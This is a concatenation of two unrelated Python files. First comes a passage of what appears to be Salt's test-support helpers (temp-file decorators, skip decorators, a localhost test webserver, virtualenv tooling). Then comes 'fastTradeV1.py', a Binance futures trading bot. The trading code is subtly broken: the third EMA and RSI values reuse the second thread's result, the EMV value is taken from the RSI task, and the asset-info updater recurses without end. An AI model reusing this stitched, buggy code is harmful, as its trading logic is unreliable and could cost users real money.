raise failure[1].with_traceback(failure[2])
return wrap
return decorator
class WithTempfile:
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
if "prefix" not in kwargs:
kwargs["prefix"] = "__salt.test."
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
name = salt.utils.files.mkstemp(**self.kwargs)
if not self.create:
os.remove(name)
try:
return self.func(testcase, name, *args, **kwargs)
finally:
try:
os.remove(name)
except OSError:
pass
with_tempfile = WithTempfile
class WithTempdir:
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
tempdir = tempfile.mkdtemp(**self.kwargs)
if not self.create:
os.rmdir(tempdir)
try:
return self.func(testcase, tempdir, *args, **kwargs)
finally:
shutil.rmtree(tempdir, ignore_errors=True)
with_tempdir = WithTempdir
def requires_system_grains(func):
"""
Function decorator which loads and passes the system's grains to the test
case.
"""
@functools.wraps(func)
def decorator(*args, **kwargs):
if not hasattr(requires_system_grains, "__grains__"):
# Late import
from tests.support.sminion import build_minion_opts
opts = build_minion_opts(minion_id="runtests-internal-sminion")
requires_system_grains.__grains__ = salt.loader.grains(opts)
kwargs["grains"] = requires_system_grains.__grains__
return func(*args, **kwargs)
return decorator
@requires_system_grains
def runs_on(grains=None, **kwargs):
"""
Skip the test if grains don't match the values passed into **kwargs
if a kwarg value is a list then skip if the grains don't match any item in the list
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if not any(str(grains.get(kw)).lower() != str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() != str(value).lower():
if reason is None:
reason = "This test runs on {}={}, not {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
@requires_system_grains
def not_runs_on(grains=None, **kwargs):
"""
Reverse of `runs_on`.
Skip the test if any grains match the values passed into **kwargs
if a kwarg value is a list then skip if the grains match any item in the list
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if any(str(grains.get(kw)).lower() == str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() == str(value).lower():
if reason is None:
reason = "This test does not run on {}={}, got {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
def _check_required_sminion_attributes(sminion_attr, *required_items):
"""
:param sminion_attr: The name of the sminion attribute to check, such as 'functions' or 'states'
:param required_items: The items that must be part of the designated sminion attribute for the decorated test
:return The packages that are not available
"""
# Late import
from tests.support.sminion import create_sminion
required_salt_items = set(required_items)
sminion = create_sminion(minion_id="runtests-internal-sminion")
available_items = list(getattr(sminion, sminion_attr))
not_available_items = set()
name = "__not_available_{items}s__".format(items=sminion_attr)
if not hasattr(sminion, name):
setattr(sminion, name, set())
cached_not_available_items = getattr(sminion, name)
for not_available_item in cached_not_available_items:
if not_available_item in required_salt_items:
not_available_items.add(not_available_item)
required_salt_items.remove(not_available_item)
for required_item_name in required_salt_items:
search_name = required_item_name
if "." not in search_name:
search_name += ".*"
if not fnmatch.filter(available_items, search_name):
not_available_items.add(required_item_name)
cached_not_available_items.add(required_item_name)
return not_available_items
def requires_salt_states(*names):
"""
Makes sure the passed salt state is available. Skips the test if not
.. versionadded:: 3000
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@requires_salt_states`, it will be removed in {date}, and"
" instead use `@pytest.mark.requires_salt_states`.",
stacklevel=3,
)
not_available = _check_required_sminion_attributes("states", *names)
if not_available:
return skip("Unavailable salt states: {}".format(*not_available))
return _id
def requires_salt_modules(*names):
"""
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@requires_salt_modules`, it will be removed in {date}, and"
" instead use `@pytest.mark.requires_salt_modules`.",
stacklevel=3,
)
not_available = _check_required_sminion_attributes("functions", *names)
if not_available:
return skip("Unavailable salt modules: {}".format(*not_available))
return _id
def skip_if_binaries_missing(*binaries, **kwargs):
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@skip_if_binaries_missing`, it will be removed in {date},"
" and instead use `@pytest.mark.skip_if_binaries_missing`.",
stacklevel=3,
)
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop("check_all", False)
message = kwargs.pop("message", None)
if kwargs:
raise RuntimeError(
"The only supported keyword argument is 'check_all' and "
"'message'. Invalid keyword arguments: {}".format(", ".join(kwargs.keys()))
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
"{}The {!r} binary was not found".format(
message and "{}. ".format(message) or "", binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
"{}None of the following binaries was found: {}".format(
message and "{}. ".format(message) or "", ", ".join(binaries)
)
)
return _id
def skip_if_not_root(func):
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@skip_if_not_root`, it will be removed in {date}, and"
" instead use `@pytest.mark.skip_if_not_root`.",
stacklevel=3,
)
setattr(func, "__skip_if_not_root__", True)
if not sys.platform.startswith("win"):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as root to run this test"
)
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != "SYSTEM":
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as an Administrator to run this test"
)
return func
def repeat(caller=None, condition=True, times=5):
"""
Repeat a test X amount of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
repeat(caller=function, condition=condition, times=times),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(1, times + 1):
log.info("%s test run %d of %s times", cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
"""
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(salt.ext.tornado.web.RequestHandler):
pass
"""
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth is None or not auth.startswith("Basic "):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header("WWW-Authenticate", "Basic realm=Restricted")
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = base64.b64decode(auth[6:]).split(":", 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
"""
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: 2018.3.0
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please replace your call 'generate_random_name({0})' with 'random_string({0},"
" lowercase=False)' as 'generate_random_name' will be removed after {{date}}".format(
prefix
),
stacklevel=3,
)
return random_string(prefix, size=size, lowercase=False)
def random_string(prefix, size=6, uppercase=True, lowercase=True, digits=True):
"""
Generates a random string.
..versionadded: 3001
Args:
prefix(str): The prefix for the random string
size(int): The size of the random string
uppercase(bool): If true, include uppercased ascii chars in choice sample
lowercase(bool): If true, include lowercased ascii chars in choice sample
digits(bool): If true, include digits in choice sample
Returns:
str: The random string
"""
if not any([uppercase, lowercase, digits]):
raise RuntimeError(
"At least one of 'uppercase', 'lowercase' or 'digits' needs to be true"
)
choices = []
if uppercase:
choices.extend(string.ascii_uppercase)
if lowercase:
choices.extend(string.ascii_lowercase)
if digits:
choices.extend(string.digits)
return prefix + "".join(random.choice(choices) for _ in range(size))
class Webserver:
"""
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
"""
def __init__(self, root=None, port=None, wait=5, handler=None, ssl_opts=None):
"""
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
"""
if port is not None and not isinstance(port, int):
raise ValueError("port must be an integer")
if root is None:
root = RUNTIME_VARS.BASE_FILES
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError("root must be a string")
self.port = port
self.wait = wait
self.handler = (
handler if handler is not None else salt.ext.tornado.web.StaticFileHandler
)
self.web_root = None
self.ssl_opts = ssl_opts
def target(self):
"""
Threading target which stands up the tornado application
"""
self.ioloop = salt.ext.tornado.ioloop.IOLoop()
self.ioloop.make_current()
if self.handler == salt.ext.tornado.web.StaticFileHandler:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler, {"path": self.root})]
)
else:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler)]
)
self.application.listen(self.port, ssl_options=self.ssl_opts)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(("127.0.0.1", self.port)) == 0
def url(self, path):
"""
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
"""
if self.web_root is None:
raise RuntimeError("Webserver instance has not been started")
err_msg = (
"invalid path, must be either a relative path or a path within {}".format(
self.root
)
)
try:
relpath = (
path if not os.path.isabs(path) else os.path.relpath(path, self.root)
)
if relpath.startswith(".." + os.sep):
raise ValueError(err_msg)
return "/".join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
"""
Starts the webserver
"""
if self.port is None:
self.port = ports.get_unused_localhost_port()
self.web_root = "http{}://127.0.0.1:{}".format(
"s" if self.ssl_opts else "", self.port
)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
"Failed to start tornado webserver on 127.0.0.1:{} within "
"{} seconds".format(self.port, self.wait)
)
def stop(self):
"""
Stops the webserver
"""
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
def __enter__(self):
self.start()
return self
def __exit__(self, *_):
self.stop()
class SaveRequestsPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Save all requests sent to the server.
"""
received_requests = []
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
self.received_requests.append(self.request)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
class MirrorPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Mirror a POST body back to the client
"""
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
body = self.request.body
log.debug("Incoming body: %s Incoming args: %s", body, args)
self.write(body)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
def dedent(text, linesep=os.linesep):
"""
A wrapper around textwrap.dedent that also sets line endings.
"""
linesep = salt.utils.stringutils.to_unicode(linesep)
unicode_text = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
clean_text = linesep.join(unicode_text.splitlines())
if unicode_text.endswith("\n"):
clean_text += linesep
if not isinstance(text, str):
return salt.utils.stringutils.to_bytes(clean_text)
return clean_text
class PatchedEnviron:
def __init__(self, **kwargs):
self.cleanup_keys = kwargs.pop("__cleanup__", ())
self.kwargs = kwargs
self.original_environ = None
def __enter__(self):
self.original_environ = os.environ.copy()
for key in self.cleanup_keys:
os.environ.pop(key, None)
# Make sure there are no unicode characters in the self.kwargs if we're
# on Python 2. These are being added to `os.environ` and causing
# problems
if sys.version_info < (3,):
kwargs = self.kwargs.copy()
clean_kwargs = {}
for k in self.kwargs:
key = k
if isinstance(key, str):
key = key.encode("utf-8")
if isinstance(self.kwargs[k], str):
kwargs[k] = kwargs[k].encode("utf-8")
clean_kwargs[key] = kwargs[k]
self.kwargs = clean_kwargs
os.environ.update(**self.kwargs)
return self
def __exit__(self, *args):
os.environ.clear()
os.environ.update(self.original_environ)
patched_environ = PatchedEnviron
def _cast_to_pathlib_path(value):
if isinstance(value, pathlib.Path):
return value
return pathlib.Path(str(value))
@attr.s(frozen=True, slots=True)
class VirtualEnv:
venv_dir = attr.ib(converter=_cast_to_pathlib_path)
env = attr.ib(default=None)
system_site_packages = attr.ib(default=False)
pip_requirement = attr.ib(default="pip>=20.2.4,<21.2", repr=False)
setuptools_requirement = attr.ib(
default="setuptools!=50.*,!=51.*,!=52.*", repr=False
)
environ = attr.ib(init=False, repr=False)
venv_python = attr.ib(init=False, repr=False)
venv_bin_dir = attr.ib(init=False, repr=False)
@venv_dir.default
def _default_venv_dir(self):
return pathlib.Path(tempfile.mkdtemp(dir=RUNTIME_VARS.TMP))
@environ.default
def _default_environ(self):
environ = os.environ.copy()
if self.env:
environ.update(self.env)
return environ
@venv_python.default
def _default_venv_python(self):
# Once we drop Py3.5 we can stop casting to string
if salt.utils.platform.is_windows():
return str(self.venv_dir / "Scripts" / "python.exe")
return str(self.venv_dir / "bin" / "python")
@venv_bin_dir.default
def _default_venv_bin_dir(self):
return pathlib.Path(self.venv_python).parent
def __enter__(self):
try:
self._create_virtualenv()
except subprocess.CalledProcessError:
raise AssertionError("Failed to create virtualenv")
return self
def __exit__(self, *args):
shutil.rmtree(str(self.venv_dir), ignore_errors=True)
def install(self, *args, **kwargs):
return self.run(self.venv_python, "-m", "pip", "install", *args, **kwargs)
def uninstall(self, *args, **kwargs):
return self.run(
self.venv_python, "-m", "pip", "uninstall", "-y", *args, **kwargs
)
def run(self, *args, **kwargs):
check = kwargs.pop("check", True)
kwargs.setdefault("cwd", str(self.venv_dir))
kwargs.setdefault("stdout", subprocess.PIPE)
kwargs.setdefault("stderr", subprocess.PIPE)
kwargs.setdefault("universal_newlines", True)
kwargs.setdefault("env", self.environ)
proc = subprocess.run(args, check=False, **kwargs)
ret = ProcessResult(
returncode=proc.returncode,
stdout=proc.stdout,
stderr=proc.stderr,
cmdline=proc.args,
)
log.debug(ret)
if check is True:
try:
proc.check_returncode()
except subprocess.CalledProcessError:
raise ProcessFailed(
"Command failed return code check", process_result=proc
)
return ret
@staticmethod
def get_real_python():
"""
The reason why the virtualenv creation is proxied by this function is mostly
because under windows, we can't seem to properly create a virtualenv off of
another virtualenv(we can on linux) and also because, we really don't want to
test virtualenv creation off of another virtualenv, we want a virtualenv created
from the original python.
Also, on windows, we must also point to the virtualenv binary outside the existing
virtualenv because it will fail otherwise
"""
try:
if salt.utils.platform.is_windows():
return os.path.join(sys.real_prefix, os.path.basename(sys.executable))
else:
python_binary_names = [
"python{}.{}".format(*sys.version_info),
"python{}".format(*sys.version_info),
"python",
]
for binary_name in python_binary_names:
python = os.path.join(sys.real_prefix, "bin", binary_name)
if os.path.exists(python):
break
else:
raise AssertionError(
"Couldn't find a python binary name under '{}' matching: {}".format(
os.path.join(sys.real_prefix, "bin"), python_binary_names
)
)
return python
except AttributeError:
return sys.executable
def run_code(self, code_string, **kwargs):
if code_string.startswith("\n"):
code_string = code_string[1:]
code_string = textwrap.dedent(code_string).rstrip()
log.debug(
"Code to run passed to python:\n>>>>>>>>>>\n%s\n<<<<<<<<<<", code_string
)
return self.run(str(self.venv_python), "-c", code_string, **kwargs)
def get_installed_packages(self):
data = {}
ret = self.run(str(self.venv_python), "-m", "pip", "list", "--format", "json")
for pkginfo in json.loads(ret.stdout):
data[pkginfo["name"]] = pkginfo["version"]
return data
def _create_virtualenv(self):
sminion = create_sminion()
sminion.functions.virtualenv.create(
str(self.venv_dir),
python=self.get_real_python(),
system_site_packages=self.system_site_packages,
)
self.install("-U", self.pip_requirement, self.setuptools_requirement)
log.debug("Created virtualenv in %s", self.venv_dir)
@attr.s(frozen=True, slots=True)
class SaltVirtualEnv(VirtualEnv):
"""
This is a VirtualEnv implementation which has this salt checkout installed in it
using static requirements
"""
def _create_virtualenv(self):
super()._create_virtualenv()
self.install(RUNTIME_VARS.CODE_DIR)
def install(self, *args, **kwargs):
env = self.environ.copy()
env.update(kwargs.pop("env", None) or {})
env["USE_STATIC_REQUIREMENTS"] = "1"
kwargs["env"] = env
return super().install(*args, **kwargs)
@contextmanager
def change_cwd(path):
"""
Context manager helper to change CWD for a with code block and restore
it at the end
"""
old_cwd = os.getcwd()
try:
os.chdir(path)
# Do stuff
yield
finally:
# Restore Old CWD
os.chdir(old_cwd)
@functools.lru_cache(maxsize=1)
def get_virtualenv_binary_path():
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(real_prefix, "Scripts", "virtualenv.exe")
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
return virtualenv_binary
class CaptureOutput:
def __init__(self, capture_stdout=True, capture_stderr=True):
if capture_stdout:
self._stdout = io.StringIO()
else:
self._stdout = None
if capture_stderr:
self._stderr = io.StringIO()
else:
self._stderr = None
self._original_stdout = None
self._original_stderr = None
def __enter__(self):
if self._stdout:
self._original_stdout = sys.stdout
sys.stdout = self._stdout
if self._stderr:
self._original_stderr = sys.stderr
sys.stderr = self._stderr
return self
def __exit__(self, *args):
if self._stdout:
sys.stdout = self._original_stdout
self._original_stdout = None
if self._stderr:
sys.stderr = self._original_stderr
self._original_stderr = None
@property
def stdout(self):
if self._stdout is None:
return
self._stdout.seek(0)
return self._stdout.read()
@property
def stderr(self):
if self._stderr is None:
return
self._stderr.seek(0)
return self._stderr.read()
|
fastTradeV1.py
|
import logging
import asyncio
from binance.client import Client
from binance_f import RequestClient
from binance_f import SubscriptionClient
from binance_f.constant.test import *
from binance_f.model import *
from binance_f.exception.binanceapiexception import BinanceApiException
from binance_f.base.printobject import *
import time
import threading
import talib as ta
import numpy as np
from datetime import datetime
import curses
import json
import os
from os import path
from talipp.ohlcv import OHLCVFactory
import talipp.indicators as talippIndicator
def utc_2_datetime(timestamp):
return '{}({})'.format(datetime.fromtimestamp(int(timestamp)), (str(time.tzname[-1])))
def calculate_ema(np_price_list, indicator_config):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
# ema1 = ta.EMA(np_price_list, indicator_config['ema']['ema1'])
# ema2 = ta.EMA(np_price_list, indicator_config['ema']['ema2'])
# ema3 = ta.EMA(np_price_list, indicator_config['ema']['ema3'])
'''
ema_task_1 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema1']))
ema_task_2 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema2']))
ema_task_3 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema3']))
ema_task_1.start()
ema_task_2.start()
ema_task_3.start()
ema_task_1.join()
ema_task_2.join()
ema_task_3.join()
ema1 = ema_task_1.get_result()
ema2 = ema_task_2.get_result()
ema3 = ema_task_2.get_result()
return [ema1, ema2, ema3]
def calculate_macd(np_price_list, indicator_config):
macd, macdsignal, macdhist = ta.MACD(np_price_list,
fastperiod=indicator_config['macd']['fastperiod'],
slowperiod=indicator_config['macd']['slowperiod'],
signalperiod=indicator_config['macd']['signalperiod'])
return [macd, macdsignal, macdhist]
def calculate_rsi(np_price_list, indicator_config):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
# rsi_1 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi1'])
# rsi_2 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi2'])
# rsi_3 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi3'])
'''
res_task_1 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi1']))
res_task_2 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi2']))
res_task_3 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi3']))
res_task_1.start()
res_task_2.start()
res_task_3.start()
res_task_1.join()
res_task_2.join()
res_task_3.join()
res1 = res_task_1.get_result()
res2 = res_task_2.get_result()
res3 = res_task_2.get_result()
return [res1, res2, res3]
def calculate_emv(open, high, low, close, volume, indicator_config):
period = indicator_config['emv']['period']
divisor = indicator_config['emv']['divisor']
ohlcv = OHLCVFactory.from_matrix2(
[
open,
high,
low,
close,
volume
]
)
return talippIndicator.EMV(period, divisor, ohlcv)[-1]
def get_indicators(kline_dict, indicator_config):
open_price_list = np.array(kline_dict['open_price_list']).astype(float)
high_price_list = np.array(kline_dict['high_price_list']).astype(float)
low_price_list = np.array(kline_dict['low_price_list']).astype(float)
close_price_list = np.array(kline_dict['close_price_list']).astype(float)
vol_list = np.array(kline_dict['volume_list']).astype(float)
MACD_task = MyThread(calculate_macd, args=(close_price_list, indicator_config))
EMA_task = MyThread(calculate_ema, args=(close_price_list, indicator_config))
RSI_task = MyThread(calculate_rsi, args=(close_price_list, indicator_config))
EMV_task = MyThread(calculate_emv, args=(open_price_list, high_price_list, low_price_list, close_price_list, vol_list, indicator_config))
# indicator_task_list = [MACD_task, EMA_task, RSI_task, EMV_task]
indicator_task_list = [MACD_task, EMA_task, RSI_task, EMV_task]
for task in indicator_task_list:
task.start()
for task in indicator_task_list:
task.join()
MACD_result = MACD_task.get_result()
EMA_result = EMA_task.get_result()
RSI_result = RSI_task.get_result()
EMV_result = RSI_task.get_result()
return MACD_result, EMA_result, RSI_result, EMV_result[-1]
def current_date_time():
return '{}({})'.format(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), (str(time.tzname[-1])))
def current_utc_time():
return time.time()
def convert_object_to_string(object):
object_dict = (object.__dict__)
string = '====================================================================\n'
for key in object_dict.keys():
string += '{}: {}\n'.format(key, object_dict[key])
return string
def put_to_log(content, path):
'''
https://www.guru99.com/reading-and-writing-files-in-python.html
'''
try:
f=open(path, "a+")
f.write(content)
f.close()
except Exception as e:
print("Logging for {} failed: {}".format(content, e))
class MyThread(threading.Thread):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
'''
def __init__(self, func, args):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result
except Exception:
return None
class positionStatus:
def __init__(self, paired_symbol):
self.paired_symbol = paired_symbol
self.position_object = Position()
# self.order_update_object =
self.order_status = None
self.order_side = None
self.order_amount = None
self.order_cumulativeFilledQty = None
self.position_last_update_time = None
self.order_last_update_time = None
class fastTrade:
def __init__(self, config):
self.__paried_symbol = config['paried_symbol']
self.__asset_symbol = config['asset_symbol']
self.__starting_asset_value = config['starting_asset_value']
self.__api_key = config['api_key']
self.__api_secret = config['api_secret']
self.__interval = config['interval']
self.__leverage = config['leverage']
self.__initial_data_num = config['initial_data_num']
self.__acc_profit = 0
self.__price_anneal = config['price_anneal']
self.__order_timeout = config['order_timeout']
self.__first_order = True
self.indicator_config = config['indicator_config']
self.position_status = positionStatus(self.__paried_symbol)
self.__recommendation_log_path = None
self.__order_log_path = None
self.__error_log_path = None
self.__position_log_path = None
self.__profit_log_path = None
self.__comission_rate = 0.0002 + 0.0004 + 0.0002
self.__latest_data_update_timestamp = 0
self.__latest_data_analysis_timestamp = 0
self.__latest_depth_update_timestamp = 0
self.order_update_list = []
self.account_update_list = []
self.depth_object = None
self.margin = '===================================================================='
self.target_profit_dict = config['target_profit']
self.__stop_loss_ratio = config['stop_loss_ratio']
self.__level_1_target_proofit = self.target_profit_dict['level1']
self.__level_2_target_proofit = self.target_profit_dict['level2']
self.__level_3_target_proofit = self.target_profit_dict['level3']
self.indicator_dict = dict()
self.finished_position_dict = {
'''
'uniqueOrderId': {
'side': 'SIDE',
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
}
'''
}
self.current_position_dict = {}
'''
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
'comission': 999
}
...
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': 0,
'level': 0,
'price': None
}
}
# Need to be updated automatically
self.client = None
self.request_client = None
self.listen_key = None
self.exchange_info = None
self.paired_asset_info = None
self.account_info = None
self.sub_client = None
self.kline_info = {
'kline_list': {
'open_price_list': [],
'high_price_list': [],
'low_price_list': [],
'close_price_list': [],
'quoteAssetVolume_list': [],
'volume_list': [],
'takerBuyBaseAssetVolume_list': [],
'takerBuyQuoteAssetVolume_list': [],
'numTrades_list': []
},
'latest_time': 0
}
'''
"pricePrecision": 5, // 价格小数点位数
"quantityPrecision": 0, // 数量小数点位数
"baseAssetPrecision": 8, // 标的资产精度
"quotePrecision": 8, // 报价资产精度
'''
self.__pricePrecision = None
self.__quantityPrecision = None
self.__baseAssetPrecision = None
self.__quotePrecision = None
# self.__asset_balance = 0
# self.__remaining = 0
def update_config_info(self):
if self.sub_client != None:
self.sub_client.unsubscribe_all()
self.update_listen_key()
self.update_client()
self.update_exchange_info()
self.update_account_info()
self.get_historical_kline()
print('========== Succeed updating trading config ==========')
def make_dir(self):
'''
https://www.guru99.com/reading-and-writing-files-in-python.html
'''
try:
current_time = current_utc_time()
folder_name = str(int(current_time))
folder_path = 'logs/' + self.__paried_symbol + '/' + folder_name
self.__recommendation_log_path = folder_path + "/recommendation.txt"
self.__order_log_path = folder_path + "/order.txt"
self.__error_log_path = folder_path + "/error.txt"
self.__position_log_path = folder_path + "/position.txt"
self.__profit_log_path = folder_path + "/profit.txt"
if not os.path.exists('logs'):
os.mkdir('logs')
if not os.path.exists('logs/' + self.__paried_symbol):
os.mkdir('logs/' + self.__paried_symbol)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
current_datetime = utc_2_datetime(current_time)
recommendation_logs = open(self.__recommendation_log_path,"w+")
recommendation_logs.write("This recommendation log was created at UTC: {}({}).\n".format(current_time, current_datetime))
recommendation_logs.close()
order_logs = open(self.__order_log_path,"w+")
order_logs.write("This order log was created at UTC: {}({}).\n".format(current_time, current_datetime))
order_logs.close()
error_logs = open(self.__error_log_path, "w+")
error_logs.write("This error log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
error_logs = open(self.__position_log_path, "w+")
error_logs.write("This position log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
error_logs = open(self.__profit_log_path, "w+")
error_logs.write("This profit log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
except Exception as e:
print("An error occurs while making log directory: ", e)
return False
else:
return True
def update_parired_asset_info(self):
"""
https://binance-docs.github.io/apidocs/futures/cn/#0f3f2d5ee7
https://www.w3schools.com/python/ref_func_hasattr.asp
"""
for item in self.exchange_info.symbols:
# PrintMix.print_data(item)
if ((hasattr(item, 'contractType')) and (hasattr(item, 'symbol')) and (hasattr(item, 'pair'))):
if ((item.pair == self.__paried_symbol) and (item.symbol == self.__paried_symbol) and (item.contractType == "PERPETUAL")):
# PrintMix.print_data(item)
self.paired_asset_info = item
self.__pricePrecision = item.pricePrecision
self.__quantityPrecision = item.quantityPrecision
self.__baseAssetPrecision = item.baseAssetPrecision
self.__quotePrecision = item.quotePrecision
break
if self.paired_asset_info == None:
raise Exception('\nInvalid symbol: {}\n'.format(self.__paried_symbol))
else:
self.update_parired_asset_info()
print('\n========== Succeed updating paired asset info ==========\n')
def update_exchange_info(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#0f3f2d5ee7
'''
result = self.request_client.get_exchange_information()
self.exchange_info = result
